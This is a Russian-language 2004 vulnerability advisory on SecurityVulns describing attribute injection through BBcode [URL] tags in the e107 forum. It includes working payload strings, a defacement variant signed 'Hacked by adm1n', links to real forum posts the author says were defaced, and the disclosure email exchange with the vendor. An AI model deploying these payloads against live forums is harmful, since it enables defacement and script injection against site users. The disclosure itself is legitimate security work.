XSS in e107 forum

2004-03-24T00:00:00
ID SECURITYVULNS:DOC:5937
Type securityvulns
Reporter Securityvulns
Modified 2004-03-24T00:00:00

Description

Существует возможность вставки произвольного HTML код в тело сообщения.

Удаленный атакующий может вставить специально отформатированный BB тэг (bbcode) , чтобы заставить форум отобразить произвольный код сценария в браузере пользователя, просматривающего злонамеренное сообщение. При желании, укоротив немного код можно выполнить произвольный сценарий не просматривая темы:

Пример:

[URL=http://some.url"style="position:absolute;left:220px;top:10px;"][size=14]test [/size][/URL]

Реальность:

[URL=http://crazy.ck.ua"style="position:absolute;left:220px;top:10px;text-weight:bold"][b][color=white][size=14]Hacked by adm1n... [/size][/color][/b][/URL] [url=http://crazy.ck.ua" style="position:absolute;top:50px;left:100px;"] [/url] [URL=http://crazy.ck.ua"style="position:absolute;left:200px;top:460px;text-weight:bold"] (c) by JET[/URL]

[URL=http://crazy.ck.ua"style="position:absolute;left:860px;top:190px;text-weight:bold"] greets: BOFH, HottaB, MOSNTER[/URL]

Ещё немного реальности:

http://www.hacked-host.nm.ru/exploit.txt

Результаты:

http://www.rastamans.com/forum/viewtopic.php?p=3013#3013 http://forum.gameworlds.ru/viewtopic.php?p=97#97 http://hardmusik.vline.ru/forums/viewtopic.php?t=20 http://www.pizdec.net/viewtopic.php?t=506 http://www.pokrovcity.ru/forum/viewtopic.php?p=6750#6750 http://ncbs.samara.ws/forum_post.php?nt.4 http://vicecitynew.u9.ru/forum_viewtopic.php?8.2

Скриншоты на память:

http://hacked-host.nm.ru/hacked2.JPG http://hacked-host.nm.ru/hacked3.JPG http://hacked-host.nm.ru/hacked4.JPG http://hacked-host.nm.ru/hacked5.JPG

http://hacked-host.nm.ru/crazy1.JPG http://hacked-host.nm.ru/crazy2.JPG

Получен ответ от вендора:

From: Steve Dunstan <jalist@e107.org> To: 'JET (aka: adm1n)' <adm1n@hotbox.ru> Date: Tuesday, March 9, 2004, 9:23:26 PM Subject: e107 forum vunreability (en) Files: <none> --====----====----====----====----====----====----====----====----====----===-- Thanks very much for letting me know, I'll fix it.

Regards Steve

jalist [ steve dunstan ] [ jalist@e107.org | jalist@jalist.com ] [ http://e107.org | http://jalist.com ]

-----Original Message----- From: JET (aka: adm1n) [mailto:adm1n@hotbox.ru] Sent: 09 March 2004 16:56 To: jalist@e107.org Cc: admin@e107.org Subject: e107 forum vunreability (en)

Hello jalist,

new bug in e107 forum (XSS):

type in field "subject", or "message":

[URL=http://some.url"style="position:absolute;left:220px;top:10px;"][size=14 ] test [/size][/URL]

or:

[URL=http://some_e107_site_forum.url"style="position:absolute;left:220px;top :10px;text-weight:bold"][b][color=white][size=14]some text here... [/size][/color][/b][/URL]

tomporary solution: disable tags [url]; [img]...

-- Best regards, JET

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=